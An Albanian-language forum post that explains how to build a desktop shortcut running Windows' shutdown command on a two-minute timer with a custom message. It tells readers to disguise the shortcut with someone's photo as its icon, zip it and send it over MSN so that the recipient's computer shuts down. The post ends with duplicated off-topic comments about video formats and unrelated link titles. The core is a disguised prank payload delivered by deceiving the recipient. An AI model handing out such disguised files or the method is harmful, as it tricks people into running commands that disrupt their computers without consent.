Qysh Me ja Ndale Dikujt PC-ne prej MSN-it?

Shkojm Desktop > klikojme new – shortcut > tek type e qesim kete:
Kodet PHP:

%windir%system32shutdown.exe -s -t 120 -c “Wildstopper Like This”

Ktu tek “WildStopper Like This” mundeni me ndryshu mesazhin qe doni te paraqitet, pastaj klikojme finish.

Ne qoftese doni poashtu mundeni mja bo raname emrin ikones dhe me bo Foto E Dikujt sipas deshires.

Pastaj krijohet nje ikon ne desktop, ate e bojm .zip dhe ja dergojme personit te cilit doni te ja fikni kompjuterin.

//Falenderojme Zgjim B. per kontributin ne kete teme

  • DEFENTIVISHT KERKA SJENI , KALLXONI MORE NJERZVE NQFAR FORMATI ME RUJT VIDEON..|
    DERI QETASHT I LEXOVA DO MSIME AS NJO SKE TAMON DERI NFUND

  • DEFENTIVISHT KERKA SJENI , KALLXONI MORE NJERZVE NQFAR FORMATI ME RUJT VIDEON..|
    DERI QETASHT I LEXOVA DO MSIME AS NJO SKE TAMON DERI NFUND

Qysh me shkarku mp3 nga YouTube?

Qysh me i krahasu dokumentet e bashkangjitura në email?